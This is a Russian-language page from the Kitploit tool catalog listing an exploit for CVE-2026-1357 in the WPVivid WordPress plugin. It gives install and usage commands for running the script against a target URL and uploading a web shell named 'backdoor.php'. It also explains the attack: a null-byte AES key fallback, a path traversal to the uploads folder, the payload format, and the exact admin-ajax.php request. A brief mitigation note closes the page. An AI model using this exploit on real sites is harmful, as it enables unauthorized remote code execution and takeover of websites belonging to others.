Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Exploit-CVE-2026-1357 — Эксплойт для CVE-2026-1357 в плагине WordPress WPVivid, позволяющий удалённое выполнение кода через специально сформированные AES-зашифрованные полезные нагрузки и обход каталога для загрузки веб-шелла. | Kitploit
Инструменты/GitHubGitHub/itsismarcos/exploit-cve-2026-1357
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubitsismarcos/exploit-cve-2026-1357

Exploit-CVE-2026-1357

Эксплойт для CVE-2026-1357 в плагине WordPress WPVivid, позволяющий удалённое выполнение кода через специально сформированные AES-зашифрованные полезные нагрузки и обход каталога для загрузки веб-шелла.

Репозиторий
137 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Установка зависимостей

pip3 install pycryptodome requests

Базовый эксплойт

python3 wpvivi.py http://target.com

Кастомная веб-шелл

python3 wpvivi.py http://target.com --shell backdoor.php

python3 wpvivi.py http://target.com --code "" Техническое объяснение: Null Byte Key: Когда RSA decrypt завершается неудачей, возвращается false, который phpseclib обрабатывает как "\x00\x00\x00". Мы используем 16 нулевых байтов в качестве ключа AES-128 ECB. Directory Traversal: Имя файла не санитизируется, что позволяет использовать ../../../../wp-content/uploads/shell.php Формат полезной нагрузки:

[len_key_hex(2 байта)] + [key_hex] + [len_data_hex(16 байтов)] + [encrypted_data] Выполнение: POST на /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(зашифрованная полезная нагрузка) Обнаружение и смягчение:

Исправлено в 0.9.124:

  • Проверка if ($key === false || empty($key)) return false;
  • Белый список расширений: zip,gz,tar,sql
Скачать инструмент